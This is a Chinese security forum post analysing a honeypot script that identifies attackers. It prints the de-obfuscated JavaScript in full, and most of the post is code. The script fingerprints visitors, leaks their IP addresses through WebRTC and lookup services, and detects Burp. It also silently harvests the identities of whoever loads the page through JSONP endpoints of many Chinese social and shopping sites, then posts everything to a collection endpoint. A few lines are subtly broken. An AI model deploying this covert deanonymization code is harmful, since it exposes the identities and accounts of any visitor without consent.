利用社交账号精准溯源的蜜罐技术
2021-01-13 17:49:13 Author: forum.90sec.com(查看原文) 阅读量:292 收藏

简介

蜜罐技术是一项已经产生很久的安全技术,普遍运用于情报收集、混淆黑客攻击面、拖延攻击时间。传统的蜜罐刻画的黑客肖像通常只能精确到一级ip,而通常黑客并不直接使用自身ip发起攻击,往往有设置了多层代理,这导致了溯源困难。
然而无论黑客怎么设置代理,攻击的设备一般还是使用自身笔记本,故如果能够获取设备中的特点指纹信息,尤其是社交账号信息,那溯源精准度是ip无法比拟的。故利用大厂的jsonp接口,获取黑客社交账号,再而进步一将信息提供给公安机关,可以有效缩短溯源时间

通过此技术需要溯源,需要满足以下几个条件

  1. 登陆过社交媒体,且未退出
  2. 能找到相关社交媒体网站的jsonp接口,可以泄露敏感信息即可
接口对比

该项技术需要通过跨域技术,调用相关社交媒体帐号的接口,于是存在两种接口

  1. jsonp接口。这类接口可跨域,且效果好,容易集成在蜜罐中,如果服务方未做特殊限制的话,一般可以调用成功
  2. 跨域资源共享(CORS) 这种接口需要相关社交媒体的接口允许跨域,且返回的Access-Control-Allow-Origin为*,才可以跨域调用。但是却又无法携带cookie。因为浏览器跨域原因,该类接口无法作为收集黑客信息使用

cors接口获取bduss信息,失败截图

样本分析

有幸在论坛中找到一个蜜罐样本,所以分析一下

该js样本混淆不是很强。只是单纯替换变量名,我们直接还原即可。以下只提供还原后的代码

获取攻击人员ip地址

获取黑客的ip地址,分别通过webrtc与淘宝接口。但是在最新版的浏览器中,webrtc因为隐私问题,已经被浏览器禁止通过该接口获取用户ip。淘宝接口从浏览器端调用该接口的话,获取的ip准确度较高


        callJSONP("https://www.taobao.com/help/getip.php", 'cb',
        function(_0xd31803) {
            sendData["network"]["externalIP"] = _0xd31803['ip'];
        });



function getPrivateIP() {
    var _0x410a6f;
    window['RTCPeerConnection'] = window["RTCPeerConnection"] || window["mozRTCPeerConnection"] || window["webkitRTCPeerConnection"];
    var _0x38415d = new RTCPeerConnection({
        'iceServers': []
    }),
    _0xb15922 = function() {};
    _0x38415d["createDataChannel"]('');
    _0x38415d["createOffer"](_0x38415d['setLocalDescription'][a0_0x2f25('0x31')](_0x38415d), _0xb15922);
    _0x38415d["onicecandidate"] = function(_0x5917f2) {
        if (!_0x5917f2 || !_0x5917f2["candidate"] || !_0x5917f2["candidate"]["candidate"]) return;
        _0x410a6f = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ ["exec"](_0x5917f2["candidate"]["candidate"])[0x1];
        _0x38415d["onicecandidate"] = _0xb15922;
    };
    var _0x2b51c1 = new Promise(function(_0x38c572, _0x3b13dc) {
        setTimeout(() = >{
            _0x38c572(_0x410a6f);
        },
        0x4b0);
    });
    return _0x2b51c1;
}

获取burp信息

function getToolInfo() {
    const _0x53a902 = {};
    var _0x236306 = new Image();
    _0x236306['onload'] = function() {
        _0x53a902['burpDet'] = true;
        sendData['tool'] = _0x53a902;
    };
    _0x236306["onerror"] = function(_0x152b0b) {
        _0x53a902["burpDet"] = ![];
        sendData["tool"] = _0x53a902;
    };
    _0x236306["src"] = "http://burp/favicon.ico";
}

调用fingerprint库,获取指纹

这个库其实没有太多用,样本中很大一部分代码都是该库的代码

function getFpHash(_0x48e364) {
    const _0x20846d = _0x48e364["map"](function(_0x260019) {
        return _0x260019["value"];
    });
    return Fingerprint2["a0_0x2f25('0x50')"](_0x20846d["join"](''), 0x1f);
}

社交媒体

重点在getSocialInfo函数,根据接口,调用jsonp分别获取用户的社交媒体相关信息,以下我单独抠出来了,可以直接运行

const version = '1.0';


function callJSONP(jsonp_url, jsonp_param, callback_func) {
    const _0x2482f8 = "jQuery" + (version + Math["random"]())["replace"](/\D/g, '') + new Date()["getTime"]();
    function _0x4923ad(_0x2d9f6b, _0x11ecab) {
        window[_0x2d9f6b] = _0x11ecab;
    }
    function _0x156417(jsonp_url, jsonp_param, callback_func) {
        var _0x340b9a = document['createElement']('a');
        _0x340b9a["href"] = jsonp_url;
        if (_0x340b9a["search"]['length']) {
            return jsonp_url + '&' + jsonp_param + '=' + callback_func;
        }
        return jsonp_url + '?' + jsonp_param + '=' + callback_func;
    }
    _0x4923ad(_0x2482f8, callback_func);
    jsonp_url = _0x156417(jsonp_url, jsonp_param, _0x2482f8);
    loadJS(jsonp_url);
}


function loadJS(_0x51fe15) {
    var _0x2555d3 = document["createElement"]('script');
    _0x2555d3["src"] = _0x51fe15;
    _0x2555d3['async'] = true;
    document["body"]["appendChild"](_0x2555d3);
}


callJSONP("http://comment.api.163.com/api/v1/products/a2869674571f77b5a…db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121", "callback",
function(_0xa8b1cd) {
    console.log(_0xa8b1cd)
});

在这里一共出现了很多jsonp接口,可能因为时间问题,很多接口目前已经无法继续使用

'https://baike.baidu.com/api/usercenter/login?msg=1&_=1560425055850'
'https://www.taobao.com/help/getip.php'
'http://pv.sohu.com/cityjson?ie=utf-8'
'https://api.m.jd.com/api?appid=pc_home_page&functionId=getBaseUserInfo&loginType=3'
'https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11'
'https://employer.58.com/index/enterpriseinfo'
'http://api.t.sina.com.cn/account/verify_credentials.json?source=27457034'
'https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B%22module%22%3A%22Base.VideoFeedsUrlServer%22%2C%22method%22%3A%22GetVideoFeedsUrl%22%2C%22param%22%3A%7B%22fileid%22%3A%220_11_013ee9171515dd784f7988b354084cf1a294299e.zip%22%7D%7D%2C%22DB%22%3A%7B%22module%22%3A%22ScoreCenter.ScoreCenterEx%22%2C%22method%22%3A%22free_login%22%2C%22param%22%3A%7B%22test%22%3A0%2C%22redirect%22%3A%22https%3A%2F%2Factivity.m.duiba.com.cn%2Fsubpage%2Findex%3FskinId%3D1049%22%2C%22activeId%22%3A0%2C%22activeType%22%3A%22%22%7D%7D%2C%22A%22%3A%7B%22module%22%3A%22CDN.SrfCdnDispatchServer%22%2C%22method%22%3A%22GetCdnDispatch%22%2C%22param%22%3A%7B%22guid%22%3A%22MS%22%7D%7D%2C%22B%22%3A%7B%22module%22%3A%22VipActivity.AwardPay%22%2C%22method%22%3A%22GetPayRank%22%2C%22param%22%3A%7B%22actid%22%3A%22D8D2CAAC126AE8FB%22%2C%22pagesize%22%3A0%7D%7D%2C%22C%22%3A%7B%22module%22%3A%22login.BasicinfoServer%22%2C%22method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D'
'https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)'
'http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121'
'http://message.dangdang.com/api/msg_detail.php?customer_id=o4P00TweebicwjhS72NWew%3D%3D&data_type=jsonp&pageindex=1&module=1&pagesize=10&_=1596772198527'
"https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11"


附跨域利用微博接口获取用户信息截图

最终通过reportInfo函数,发送给蜜罐做溯源分析

function reportInfo(_0x40eee1) {
    const _0x56bbdc = "/api/portrait";
    const _0x279db4 = new XMLHttpRequest();
    _0x279db4['open']("POST", _0x56bbdc, true);
    _0x279db4["setRequestHeader"]("Content-Type", "application/json");
    _0x40eee1 = JSON["stringify"](_0x40eee1);
    _0x279db4["send"](_0x40eee1);
}

附核心代码


var a0_0x2fc9 = ['displayName', 'replace', 'http://burp/favicon.ico', 'isAuthenticated', 'href', 'key', 'setRequestHeader', 'onicecandidate', 'publicIP', 'search', 'avatar_hd', 'https://baike.baidu.com/api/usercenter/login?msg=1&_=1560425055850', 'webkitRTCPeerConnection', 'network', 'POST', '/api/portrait', 'callback', 'https://www.taobao.com/help/getip.php', 'email', 'jsonp', 'tool', 'bind', 'cip', 'username', 'http://pv.sohu.com/cityjson?ie=utf-8', 'candidate', 'RTCPeerConnection', 'data', 'uin', 'createOffer', 'sina', 'murmur', 'join', 'exec', 'iqiyi', 'user', 'https://api.m.jd.com/api?appid=pc_home_page&functionId=getBaseUserInfo&loginType=3', 'isLogin', 'then', 'map', 'push', 'extraInfo', 'queryInfo', 'netease', 'https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11', 'headImg', 'onerror', 'https://employer.58.com/index/enterpriseinfo', 'body', 'privateIP', 'createElement', 'random', 'x64hash128', 'http://api.t.sina.com.cn/account/verify_credentials.json?source=27457034', 'returnObj', 'externalIP', 'src', 'screen_name', 'mozRTCPeerConnection', 'https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B%22module%22%3A%22Base.VideoFeedsUrlServer%22%2C%22method%22%3A%22GetVideoFeedsUrl%22%2C%22param%22%3A%7B%22fileid%22%3A%220_11_013ee9171515dd784f7988b354084cf1a294299e.zip%22%7D%7D%2C%22DB%22%3A%7B%22module%22%3A%22ScoreCenter.ScoreCenterEx%22%2C%22method%22%3A%22free_login%22%2C%22param%22%3A%7B%22test%22%3A0%2C%22redirect%22%3A%22https%3A%2F%2Factivity.m.duiba.com.cn%2Fsubpage%2Findex%3FskinId%3D1049%22%2C%22activeId%22%3A0%2C%22activeType%22%3A%22%22%7D%7D%2C%22A%22%3A%7B%22module%22%3A%22CDN.SrfCdnDispatchServer%22%2C%22method%22%3A%22GetCdnDispatch%22%2C%22param%22%3A%7B%22guid%22%3A%22MS%22%7D%7D%2C%22B%22%3A%7B%22module%22%3A%22VipActivity.AwardPay%22%2C%22method%22%3A%22GetPayRank%22%2C%22param%22%3A%7B%22actid%22%3A%22D8D2CAAC126AE8FB%22%2C%22pagesize%22%3A0%7D%7D%2C%22C%22%3A%7B%22module%22%3A%22login.BasicinfoServer%22%2C%22method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D', 'stringify', 'avatar', 'get', 'Content-Type', 'application/json', 'social', 'value', 'getTime', 'jdScore', 'rankinfo', 'uid', 'toString', 'send', 'jQuery', 'split', 'createDataChannel', 'appendChild', 'https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)', 'http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121', 'uname', 'baidu', 'name', 'burpDet']; (function(_0x3095b6, _0x2fc9a8) {
    var _0x2f254b = function(_0x4dc742) {
        while (--_0x4dc742) {
            _0x3095b6['push'](_0x3095b6['shift']());
        }
    };
    _0x2f254b(++_0x2fc9a8);
} (a0_0x2fc9, 0x130));
var a0_0x2f25 = function(_0x3095b6, _0x2fc9a8) {
    _0x3095b6 = _0x3095b6 - 0x0;
    var _0x2f254b = a0_0x2fc9[_0x3095b6];
    return _0x2f254b;
};
const version = '1.0';
var sendData = {};
var fpData = {};
var fpOptions = {
    'fonts': {},
    'excludes': {
        'enumerateDevices': true,
        'pixelRatio': true
    }
};
function loadJS(_0x51fe15) {
    var _0x2555d3 = document["createElement"]('script');
    _0x2555d3["src"] = _0x51fe15;
    _0x2555d3['async'] = true;
    document["body"]["appendChild"](_0x2555d3);
}
function reportInfo(_0x40eee1) {
    const _0x56bbdc = "/api/portrait";
    const _0x279db4 = new XMLHttpRequest();
    _0x279db4['open']("POST", _0x56bbdc, true);
    _0x279db4["setRequestHeader"]("Content-Type", "application/json");
    _0x40eee1 = JSON["stringify"](_0x40eee1);
    _0x279db4["send"](_0x40eee1);
}
function getPrivateIP() {
    var _0x410a6f;
    window['RTCPeerConnection'] = window["RTCPeerConnection"] || window["mozRTCPeerConnection"] || window["webkitRTCPeerConnection"];
    var _0x38415d = new RTCPeerConnection({
        'iceServers': []
    }),
    _0xb15922 = function() {};
    _0x38415d["createDataChannel"]('');
    _0x38415d["createOffer"](_0x38415d['setLocalDescription'][a0_0x2f25('0x31')](_0x38415d), _0xb15922);
    _0x38415d["onicecandidate"] = function(_0x5917f2) {
        if (!_0x5917f2 || !_0x5917f2["candidate"] || !_0x5917f2["candidate"]["candidate"]) return;
        _0x410a6f = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ ["exec"](_0x5917f2["candidate"]["candidate"])[0x1];
        _0x38415d["onicecandidate"] = _0xb15922;
    };
    var _0x2b51c1 = new Promise(function(_0x38c572, _0x3b13dc) {
        setTimeout(() = >{
            _0x38c572(_0x410a6f);
        },
        0x4b0);
    });
    return _0x2b51c1;
}
function getNetworkInfo() {
    const _0x34e9f0 = {};
    _0x34e9f0["publicIP"] = returnCitySN && returnCitySN["cip"];
    var _0x15270f = new Promise(function(_0x49a064, _0x1c5cad) {
        _0x49a064(_0x34e9f0);
    });
    return _0x15270f;
}
function getToolInfo() {
    const _0x53a902 = {};
    var _0x236306 = new Image();
    _0x236306['onload'] = function() {
        _0x53a902['burpDet'] = true;
        sendData['tool'] = _0x53a902;
    };
    _0x236306["onerror"] = function(_0x152b0b) {
        _0x53a902["burpDet"] = ![];
        sendData["tool"] = _0x53a902;
    };
    _0x236306["src"] = "http://burp/favicon.ico";
}
function getFpHash(_0x48e364) {
    const _0x20846d = _0x48e364["map"](function(_0x260019) {
        return _0x260019["value"];
    });
    return Fingerprint2["x64hash128"](_0x20846d["join"](''), 0x1f);
}
function getSocialInfo() {
    var _0x166b4e = [];
    callJSONP("https://baike.baidu.com/api/usercenter/login?msg=1&_=1560425055850", "callback",
    function(_0x44f603) {
        var _0x21beb2 = {
            'channel': "baidu",
            'extraInfo': {}
        };
        if (_0x44f603["isLogin"]) {
            if (_0x44f603['uid']) {
                _0x21beb2['uid'] = _0x44f603["uid"]['toString']();
            }
            if (_0x44f603["displayName"]) {
                _0x21beb2["name"] = _0x44f603['displayName'];
            }
            if (_0x44f603["uname"]) {
                _0x21beb2["name"] = _0x44f603['uname'];
                _0x21beb2["uname"] = _0x44f603["uname"];
            }
            if (_0x44f603['portraitUrl']) {
                _0x21beb2["avatar"] = _0x44f603['portraitUrl'];
            }
            _0x166b4e["push"](_0x21beb2);
        }
    });
    callJSONP(a0_0x2f25('0x4b'), "callback",
    function(_0x113e4f) {
        var _0x434078 = {
            'channel': '58',
            'extraInfo': {}
        };
        _0x113e4f = _0x113e4f['data'];
        if (_0x113e4f['username']) {
            _0x434078["uname"] = _0x113e4f[a0_0x2f25('0x33')];
            _0x166b4e["push"](_0x434078);
        }
    });
    callJSONP("http://api.t.sina.com.cn/account/verify_credentials.json?source=27457034", "callback",
    function(_0xa8b1cd) {
        console.log(_0xa8b1cd)
        var _0x51ee5f = {
            'channel': 'weibo',
            'extraInfo': {}
        };
        if (_0xa8b1cd['data']) {
            _0xa8b1cd = _0xa8b1cd['data'];
            if (_0xa8b1cd['id']) {
                _0x51ee5f["uid"] = _0xa8b1cd['id']["toString"]();
                if (_0xa8b1cd[a0_0x2f25('0x2')]) {
                    _0x51ee5f["name"] = _0xa8b1cd['screen_name'];
                }
                if (_0xa8b1cd["name"]) {
                    _0x51ee5f["name"] = _0xa8b1cd["name"];
                }
                if (_0xa8b1cd[a0_0x2f25('0x26')]) {
                    _0x51ee5f["avatar"] = _0xa8b1cd['avatar_hd'];
                }
                _0x166b4e["push"](_0x51ee5f);
            }
        }
    });
    callJSONP("https://api.m.jd.com/api?appid=pc_home_page&functionId=getBaseUserInfo&loginType=3", "jsonp",
    function(_0xfbf730) {
        var _0x5d43c8 = {
            'channel': 'jd',
            'extraInfo': {}
        };
        if (_0xfbf730[a0_0x2f25('0x52')]) {
            _0xfbf730 = _0xfbf730[a0_0x2f25('0x52')];
            if (_0xfbf730[a0_0x2f25('0x1f')] == 0x1) {
                _0x5d43c8["name"] = _0xfbf730['userNickName'];
                _0x5d43c8[a0_0x2f25('0x45')] = {
                    'jdScore': _0xfbf730[a0_0x2f25('0xd')],
                    'xbCreditScore': _0xfbf730['xbCreditScore']
                };
                if (_0xfbf730[a0_0x2f25('0x49')]) {
                    _0x5d43c8["avatar"] = _0xfbf730[a0_0x2f25('0x49')];
                }
                _0x166b4e["push"](_0x5d43c8);
            }
        }
    });
    callJSONP("https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)", "callback",
    function(_0x4aac43) {
        var _0x442377 = {
            'channel': a0_0x2f25('0x3a'),
            'extraInfo': {}
        };
        if (_0x4aac43["uid"]) {
            _0x442377["uid"] = _0x4aac43["uid"]["toString"]();
            _0x166b4e["push"](_0x442377);
        }
    });
    callJSONP("http://comment.api.163.com/api/v1/products/a2869674571f77b5a…db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121", 'callback',
    function(_0x569fd6) {
        var _0x16f4e7 = {
            'channel': a0_0x2f25('0x47'),
            'extraInfo': {}
        };
        if (_0x569fd6[a0_0x2f25('0x3f')]) {
            _0x569fd6 = _0x569fd6[a0_0x2f25('0x3f')];
            if (_0x569fd6['userId']) {
                _0x16f4e7["uid"] = _0x569fd6['userId']['toString']();
            }
            if (_0x569fd6["avatar"]) {
                _0x16f4e7["avatar"] = _0x569fd6['avatar'];
            }
            if (_0x569fd6[a0_0x2f25('0x33')]) {
                _0x16f4e7["uname"] = atob(_0x569fd6['username']);
            }
            _0x166b4e['push'](_0x16f4e7);
        }
    });
    callJSONP("https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B…method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D", "callback",
    function(_0x14e20e) {
        const _0x4fb80a = {
            'channel': 'qq'
        };
        const _0x24eb14 = _0x14e20e['B'];
        const _0x2d845f = _0x14e20e['C'];
        if (_0x24eb14['data'] && _0x2d845f['data']) {
            var _0x355a27 = ![];
            const _0x41f36d = _0x24eb14["data"];
            const _0x79742d = _0x2d845f["data"];
            if (_0x41f36d && _0x41f36d[a0_0x2f25('0xe')] && _0x41f36d[a0_0x2f25('0xe')]['uin']) {
                _0x4fb80a["uid"] = _0x41f36d[a0_0x2f25('0xe')][a0_0x2f25('0x38')]["toString"]();
                _0x4fb80a["uname"] = _0x41f36d['rankinfo'][a0_0x2f25('0x38')]["toString"]();
                _0x355a27 = true;
            }
            if (_0x79742d["name"]) {
                _0x4fb80a["name"] = _0x79742d['name'];
                _0x355a27 = true;
            }
            if (_0x355a27) {
                _0x166b4e["push"](_0x4fb80a);
            }
        }
    });
    var _0x5f4ffa = {
        'channel': "iqiyi",
        'extraInfo': {}
    };
    if (cb_r0r7tg["uid"]) {
        _0x5f4ffa['uid'] = cb_r0r7tg["uid"]["toString"]();
        if (cb_r0r7tg["data"]) {}
        _0x166b4e["push"](_0x5f4ffa);
    }
    callJSONP('http://message.dangdang.com/api/msg_detail.php?customer_id=o4P00TweebicwjhS72NWew%3D%3D&data_type=jsonp&pageindex=1&module=1&pagesize=10&_=1596772198527', 'callback',
    function(_0x5f0be3) {
        const _0xab7f14 = {
            'channel': 'dangdang'
        };
        if (_0x5f0be3[a0_0x2f25('0x46')]) {
            _0x5f0be3 = _0x5f0be3['queryInfo'];
            if (_0x5f0be3['ddoy']) {
                for (var _0x379720 of _0x5f0be3['ddoy'][a0_0x2f25('0x13')]('&')) {
                    paramSplit = _0x379720['split']('=');
                    if (paramSplit['length'] == 0x2) {
                        var _0x5dcb77 = paramSplit[0x0];
                        var _0x156e95 = paramSplit[0x1];
                        if (_0x5dcb77 == "uname" && _0x156e95) {
                            _0xab7f14["uname"] = _0x156e95;
                        } else if (_0x5dcb77 == a0_0x2f25('0x2e') && _0x156e95) {
                            _0xab7f14[a0_0x2f25('0x2e')] = _0x156e95;
                        }
                        _0x166b4e["push"](_0xab7f14);
                    }
                }
            }
        }
    });
    var _0x2e1a87 = new Promise(function(_0x16e027, _0x5b0956) {
        window['setTimeout'](function() {
            _0x16e027(_0x166b4e);
        },
        0x4b0);
    });
    return _0x2e1a87;
}
function callJSONP(jsonp_url, jsonp_param, callback_func) {
    const _0x2482f8 = "jQuery" + (version + Math["random"]())["replace"](/\D/g, '') + new Date()["getTime"]();
    function _0x4923ad(_0x2d9f6b, _0x11ecab) {
        window[_0x2d9f6b] = _0x11ecab;
    }
    function _0x156417(jsonp_url, jsonp_param, callback_func) {
        var _0x340b9a = document['createElement']('a');
        _0x340b9a["href"] = jsonp_url;
        if (_0x340b9a["search"]['length']) {
            return jsonp_url + '&' + jsonp_param + '=' + callback_func;
        }
        return jsonp_url + '?' + jsonp_param + '=' + callback_func;
    }
    _0x4923ad(_0x2482f8, callback_func);
    jsonp_url = _0x156417(jsonp_url, jsonp_param, _0x2482f8);
    loadJS(jsonp_url);
}
function handleComponent(_0x3003a0) {
    fpData["murmur"] = getFpHash(_0x3003a0);
    for (var _0x48f6e6 in _0x3003a0) {
        const _0x5e47d2 = _0x3003a0[_0x48f6e6];
        const _0x1384f0 = _0x5e47d2["key"];
        const _0x2bac91 = _0x5e47d2["value"];
        fpData[_0x1384f0] = _0x2bac91;
    }
    sendData['browser'] = fpData;
    getToolInfo();
    getNetworkInfo()['then'](function(_0xcae004) {
        callJSONP("https://www.taobao.com/help/getip.php", 'cb',
        function(_0xd31803) {
            sendData["network"]["externalIP"] = _0xd31803['ip'];
        });
        getPrivateIP()["then"](function(_0x17cdc5) {
            sendData["network"]["privateIP"] = _0x17cdc5;
            getSocialInfo()["then"](function(_0x33c15c) {
                sendData[social] = _0x33c15c;
                reportInfo(sendData);
            });
        });
    });
}
loadJS("http://pv.sohu.com/cityjson?ie=utf-8");
loadJS("https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11");
if (window['requestIdleCallback']) {
    requestIdleCallback(function() {
        Fingerprint2['get'](fpOptions, handleComponent);
    });
} else {
    setTimeout(function() {
        Fingerprint2[a0_0x2f25('0x7')](fpOptions, handleComponent);
    },
    0x1f4);
}



欢迎关注 宽字节安全 公众号


文章来源: https://forum.90sec.com/t/topic/1529/1
如有侵权请联系:admin#unsafe.sh